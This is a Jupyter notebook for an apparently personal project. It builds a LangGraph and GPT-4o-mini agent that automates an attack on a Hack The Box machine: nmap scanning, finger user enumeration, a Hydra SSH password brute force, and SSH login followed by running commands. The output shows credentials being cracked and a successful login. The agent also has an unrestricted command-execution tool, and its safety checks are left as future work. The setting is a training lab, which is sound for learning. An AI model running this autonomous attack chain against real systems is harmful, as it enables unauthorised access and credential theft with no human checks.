# HTB ReAct Agent
- **Author**: Ella Duffy
- **Version**: 1.0.2
- **Description**: Implements a ReAct (Reasoning + Action + Observation) agent for HTB pentesting using LangGraph. This agent uses existing tools from `ssh_command_executor.py` to perform port scanning, user enumeration, and SSH port detection, with plans for brute-forcing and input sanitization.

## Objective
- Automate HTB attack chaining with a stateful, reasoning-based agent.
- Leverage `scan_ports`, `enumerate_users`, and `detect_ssh_port` and `ssh_execute_command` tools.
- Prepare for future enhancements like brute-forcing and safety checks.

## Prerequisites
- Parrot OS VM (e.g., `10.0.0.215`) with HTB VPN active.
- `ssh_command_executor.py` in the working directory.
- OpenAI API key set in `~/Ella_AI/.env` as `OPENAI_API_KEY`.

## Overview of ReAct Framework Implementation
This HTB ReAct agent is designed based on the **ReAct (Reasoning + Acting)** framework, which synergizes step-by-step reasoning with action execution to solve complex tasks. Here's how it aligns:

- **Reasoning**: The agent uses a custom prompt template that instructs the language model (e.g., `gpt-4o-mini`) to think step-by-step, analyzing the task, current state, previous results, and memory to decide the next action. The "Let's think step by step" directive encourages deliberate planning.

- **Acting**: The agent leverages a set of tools (`scan_ports`, `enumerate_users`, `detect_ssh_port`, `ssh_execute_command`) integrated via LangGraph's `create_react_agent`. These tools allow the agent to interact with the HTB environment (e.g., scanning ports or executing SSH commands) based on its reasoning.

- **Observation**: Results from tool executions are stored in the `AgentState` (`result` field) and memory (`ChatMessageHistory`), enabling the agent to observe outcomes and refine its approach. The state graph's transitions (e.g., from `ports_scanned` to `enumerate_users`) facilitate this iterative process.

- **Iteration**: The agent repeats the reason-act-observe cycle, guided by the `next_step` function, until the task (e.g., reconnaissance and command execution) is complete, aligning with ReAct's iterative nature.

- **Implementation Approach**: Initially, the agent uses a hardcoded `StateGraph` with predefined nodes and transitions to ensure a reliable workflow for pentesting tasks. However, the development is moving toward a more dynamic approach, where the language model will drive tool selection and action sequences autonomously using a `ToolExecutor`, reducing reliance on fixed graph structures for greater adaptability.

This hybrid approach balances reliability with flexibility, with future enhancements planned to fully embrace the dynamic ReAct paradigm.

![ReAct Framework](images/react.png)

In [1]:
#Imports and setup

import logging
import os
import json
from langgraph.prebuilt import create_react_agent
from langgraph.graph import StateGraph, START, END
from langchain_openai import ChatOpenAI
from langchain_core.prompts import ChatPromptTemplate
from langchain_community.chat_message_histories import ChatMessageHistory
from langchain.agents import Tool
from langchain_core.runnables import RunnableLambda
from ssh_command_executor import Tools #my defined Tools class
from typing import TypedDict, Annotated, List, Dict
import operator

# Set up logging
logging.basicConfig(
    level=logging.INFO,
    format='%(asctime)s - %(levelname)s - %(message)s',
    handlers=[
        logging.FileHandler('logs/react_attack.log'),
        logging.StreamHandler()
    ]
)
logger = logging.getLogger(__name__)

logger.info("Loading HTB ReAct Agent")

with open("config.json", "r") as f:
    CONFIG = json.load(f)

# Load API key from environment
api_key = os.getenv("OPENAI_API_KEY")
if not api_key:
    raise ValueError("OPENAI_API_KEY not found in environment. Set it in .env or export it manually.")
logger.info("API key loaded successfully")

# Initialize LLM
llm = ChatOpenAI(model_name="gpt-4o-mini", temperature=0, api_key=api_key)

# Initialize memory
memory = ChatMessageHistory()

# Initialize my defined Tools that are imported from ssh_command_executor
tools = Tools(memory=memory)

2025-07-16 15:57:58,003 - INFO - Loading SSH Command Executor
2025-07-16 15:57:58,020 - INFO - Loading HTB ReAct Agent
2025-07-16 15:57:58,030 - INFO - API key loaded successfully


In [2]:
#Define tools for the agent
tools_list = [
    Tool(
        name="ssh_execute_command",
        func=lambda host, username, command: tools.ssh_command_executor(host, username, command),
        description="Execute a custom SSH command on the target HTB machine. Args: host (str), username (str), command (str)"
    ),
    Tool(
        name="scan_ports",
        func=lambda host, username, target: tools.scan_ports(host, username, target),
        description="Scan open ports on the target HTB machine and return a dictionary of port:service pairs. Args: host (str), username (str), target (str)"
    ),
    Tool(
        name="enumerate_users",
        func=lambda host, username, target: tools.enumerate_users(host, username, target),
        description="Enumerate SSH users on the target HTB machine if finger service (port 79) is available. Args: host (str), username (str), target (str)"
    ),
    Tool(
        name="detect_ssh_port",
        func=lambda host, username, target: tools.detect_ssh_port(host, username, target),
        description="Detect the SSH port on the target HTB machine using memory-based analysis. Args: host (str), username (str), target (str)"
    ),
    Tool(
        name="run_hydra_attack",
        func=lambda host, username, target, target_username, password_file, port: tools.run_hydra_attack(host, username, target, target_username, password_file, port),
        description="Run a Hydra password attack on the target HTB machine for a specific username and port. Args: host (str), username (str), target (str), target_username (str), password_file (str), port (int)"
    ),
    Tool(
        name="ssh_login",
        func=lambda host, username, target, target_username, password, port: tools.ssh_login(host, username, target, target_username, password, port),
        description="Attempt SSH login to a target with username, password, and port. Args: host (str), username (str), target (str), target_username (str), password (str), port (int)"
    ),
    Tool(
        name="list_wordlists",
        func=lambda category: tools.list_wordlists(category),
        description="List available wordlists for usernames or passwords. Args: category (str, 'usernames' or 'passwords')"
    )

]

In [3]:
# Define the Agent State
class AgentState(TypedDict):
    task: str
    memory: str
    result: Annotated[list, operator.add]
    current_step: str
    host: str
    username: str
    target: str
    target_username: str
    usernames_to_try: List[Dict[str,str]]
    credentials: dict
    ssh_port: int

In [4]:
# Define the ReAct prompot template
prompt = ChatPromptTemplate.from_template(
    """You are an AI assistance for Hack The Box pentesting. Use the provided tools to perform taks on the HTB target.
    Follow this process:
    1. Reason about the task and decide which tool(s) to use based on the current state and previous results.
    2. If user enumeration fails (e.g., no finger service) or returns no users, skip Hydra attacks and process to completion.
    3. Take action by calling the appropriate tool with the correct arguments.
    4. Observe the result and decide the next step, repeating if necessary, or use ssh_execute_command for custom actions.
    5. If valid SSH credentials are found, attempt an SSH login using `ssh_login`.

    Tools available: {tool_names}

    Task: {task}

    Previous conversation: {memory}

    Current state: {current_step}
    Previous results: {result}
    Usernames to try: {usernames_to_try}

    Reasoning: Let's think step by step:
    
    """
)

In [5]:
# Create the ReAct agent
agent = create_react_agent(
    model=llm, 
    tools=tools_list, 
    prompt=prompt
    )

In [6]:
# Build the state graph

def scan_ports_node(state: AgentState):
    logger.info(f"Executing scan_ports on {state['target']}")
    result = tools.scan_ports(state['host'], state['username'], state['target']) #returns dictionary of port:service pairs
    return {"result": [result], "current_step": "ports_scanned"}

def enumerate_users_node(state: AgentState):
    logger.info(f"Executing enumerate_users on {state['target']}")
    ports = state["result"][-1] if state["result"] else {}
    users = []
    usernames_to_try = []
    if "79" in ports:
        wordlist = "/usr/share/seclists/Usernames/Names/names.txt"
        users = tools.enumerate_users(state['host'], state['username'], state['target'], wordlist=wordlist)
        if users:
            usernames_to_try = [{"username": user, "wordlist": "/usr/share/seclists/Passwords/probable-v2-top1575.txt"} for user in users]
            usernames_to_try.sort(key=lambda x: x["username"] != "sunny")
    target_username = usernames_to_try[0]["username"] if usernames_to_try else None
    return {
        "result": [users],
        "current_step": "users_enumerated" if users else "users_skipped",
        "target_username": target_username,
        "usernames_to_try": usernames_to_try
    }

def detect_ssh_port_node(state: AgentState):
    logger.info(f"Executing detect_ssh_port on {state['target']}")
    ssh_port = tools.detect_ssh_port(state['host'], state['username'], state['target'])
    return {"result": [ssh_port] if ssh_port else [], "current_step": "ssh_detected", "ssh_port": ssh_port}

def hydra_attack_node(state: AgentState):
    logger.info(f"Executing run_hydra_attack on {state['target']} for user {state['target_username']}")
    ssh_port = state.get("ssh_port")
    usernames_to_try = state.get("usernames_to_try", [])
    if not ssh_port:
        logger.warning(f"No SSH port detected for {state['target']}, skipping Hydra attack")
        return {"result": [], "current_step": "hydra_skipped", "credentials": {}}
    if not usernames_to_try or not state.get("target_username"):
        logger.warning(f"No usernames to try for Hydra attack on {state['target']}")
        return {"result": [], "current_step": "hydra_skipped", "credentials": {}}
    current_user = usernames_to_try[0]
    password_file = current_user.get("wordlist")
    # Validate wordlist existence
    check_command = f"ls {password_file}"
    check_result = tools.ssh_command_executor(state['host'], state['username'], check_command)
    if "No such file" in check_result:
        logger.error(f"Password file {password_file} not found on {state['host']}")
        return {"result": [], "current_step": "hydra_skipped", "credentials": {}}
    try:
        credentials = tools.run_hydra_attack(state['host'], state['username'], state['target'], current_user["username"], password_file, ssh_port)
        logger.debug(f"Raw credentials output from run_hydra_attack: {credentials}")
        if not isinstance(credentials, dict):
            logger.error(f"Unexpected credentials type: {type(credentials)}, expected dict")
            credentials = {}
        new_usernames_to_try = [] if credentials else usernames_to_try[1:]
        logger.info(f"Hydra attack result for {current_user['username']}: {credentials}")
        return {
            "result": [credentials] if credentials else [],
            "current_step": "hydra_attacked",
            "credentials": credentials,
            "usernames_to_try": new_usernames_to_try,
            "target_username": new_usernames_to_try[0]["username"] if new_usernames_to_try else None
        }
    except Exception as e:
        logger.error(f"Hydra attack failed for {current_user['username']}: {str(e)}")
        new_usernames_to_try = usernames_to_try[1:]
        return {
            "result": [],
            "current_step": "hydra_attacked",
            "credentials": {},
            "usernames_to_try": new_usernames_to_try,
            "target_username": new_usernames_to_try[0]["username"] if new_usernames_to_try else None
        }


def ssh_login_node(state: AgentState):
    logger.info(f"Executing ssh_login on {state['target']} for user {state['target_username']}")
    credentials = state.get("credentials", {})
    ssh_port = state.get("ssh_port", 22) #default to 22
    if credentials:
        for user, password in credentials.items():
            result = tools.ssh_login(state['host'], state['username'], state['target'], user, password, ssh_port)
            return {"result": [result], "current_step": "login_attempted"}
    logger.warning(f"No credentials found for SSH login on {state['target']}")
    return {"result": [], "current_step": "login_skipped"}

def execute_command_node(state: AgentState):
    logger.info(f"Executing ssh_execute_command on {state['target']}")
    # Allow LLM to decide the command via reasoning
    result = tools.ssh_command_executor(state['host'], state['username'], "whoami") # Default command, LLM can override
    return {"result": state["result"] + [result], "current_step": "command_executed"}

# Define conditional transitions
def next_step(state: AgentState):
    current_step = state.get("current_step", "start")
    if current_step in ["command_executed", "login_skipped", "hydra_skipped"]:
        return END
    if current_step == "start":
        return "scan_ports"
    if current_step == "ports_scanned":
        return "enumerate_users"
    if current_step == "users_enumerated" or current_step == "users_skipped":
        return "detect_ssh_port"
    if current_step == "ssh_detected":
        return "hydra_attack" if state.get("usernames_to_try") else "hydra_skipped"
    if current_step == "hydra_attacked":
        if state.get("credentials", {}):
            return "ssh_login"
        if state.get("usernames_to_try", []):
            return "hydra_attack"
        return "login_skipped"
    if current_step == "login_attempted":
        return "execute_command"
    return "scan_ports"

graph = StateGraph(AgentState)
graph.add_node("scan_ports", scan_ports_node)
graph.add_node("enumerate_users", enumerate_users_node)
graph.add_node("detect_ssh_port", detect_ssh_port_node)
graph.add_node("hydra_attack", hydra_attack_node)
graph.add_node("ssh_login", ssh_login_node)
graph.add_node("execute_command", execute_command_node)

graph.set_entry_point("scan_ports")
graph.add_conditional_edges("scan_ports", next_step)
graph.add_conditional_edges("enumerate_users", next_step)
graph.add_conditional_edges("detect_ssh_port", next_step)
graph.add_conditional_edges("hydra_attack", next_step)
graph.add_conditional_edges("ssh_login", next_step)
graph.add_conditional_edges("execute_command", next_step)

app = graph.compile()


In [7]:
# Define a simple task function
def run_react_agent(host, username, target):
    logger.info(f"Starting ReAct agent on {target} via {host}")
    initial_state = {
        "task": f"Perform reconnaissance on the HTB target {target} by scanning ports, enumerating users if possible, detecting the SSH port, running a Hydra password attack for enumerate users, attempting SSH login with found credentials, and running a custom command. Use ssh_execute_command to explore further if needed.",
        "memory": "\n".join(msg.get("content", "") for msg in memory.messages), #ensure we are working with human-readable string representation
        "result": [],
        "current_step": "start",
        "host": host,
        "username": username,
        "target": target,
        "target_username": None, 
        "usernames_to_try": [],
        "credentials": {},
        "ssh_port": 22 
    }
    result = app.invoke(initial_state)
    logger.info(f"ReAct agent completed: {result['result']}")
    return result['result']

In [8]:
# Run the Agent
if __name__ == "__main__":
    host = "10.0.0.215"
    username = "user"
    target = "10.10.10.76"
    result = run_react_agent(host, username, target)
    print("Final result:", result)

    # Debug memory
    print("Memory content:", "\n".join(msg["content"] for msg in memory.messages if "content" in msg)) 

2025-07-16 15:57:58,944 - INFO - Starting ReAct agent on 10.10.10.76 via 10.0.0.215
2025-07-16 15:57:58,952 - INFO - Executing scan_ports on 10.10.10.76
2025-07-16 15:57:58,953 - INFO - Scanning open ports on 10.10.10.76
2025-07-16 15:57:58,955 - INFO - Set timeout to 360 seconds for Nmap command
2025-07-16 15:57:58,959 - INFO - Connecting to 10.0.0.215 as user
2025-07-16 15:57:58,993 - INFO - Connected (version 2.0, client OpenSSH_9.2p1)
2025-07-16 15:57:59,424 - INFO - Authentication (publickey) successful!
2025-07-16 15:57:59,425 - INFO - SSH connection established to 10.0.0.215
2025-07-16 15:57:59,426 - INFO - Executing command: PATH=$PATH:/sbin:/usr/sbin nmap -p1-1000,22022 10.10.10.76 --max-retries 2 -Pn --open
2025-07-16 15:58:22,650 - INFO - Command exit status: 0
2025-07-16 15:58:22,651 - INFO - Command output:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-16 19:56 UTC
Nmap scan report for 10.10.10.76
Host is up (1.5s latency).
Not shown: 595 closed tcp ports (conn-ref

Final result: [{'79': 'finger', '111': 'rpcbind', '515': 'printer', '22022': 'unknown'}, ['sammy', 'sunny'], 22022, {'sunny': 'sunday'}, {'status': 'success', 'output': "sunny\nWarning: Permanently added '[10.10.10.76]:22022' (ED25519) to the list of known hosts."}, {'79': 'finger', '111': 'rpcbind', '515': 'printer', '22022': 'unknown'}, ['sammy', 'sunny'], 22022, {'sunny': 'sunday'}, {'status': 'success', 'output': "sunny\nWarning: Permanently added '[10.10.10.76]:22022' (ED25519) to the list of known hosts."}, 'user']
Memory content: Scanned ports on 10.10.10.76: {'79': 'finger', '111': 'rpcbind', '515': 'printer', '22022': 'unknown'}
Enumerated users on 10.10.10.76: ['sammy', 'sunny']
SSH detected on port: 22022
Hydra success: {'sunny': 'sunday'} on 10.10.10.76
SSH login to 10.10.10.76 as sunny succeeded: sunny
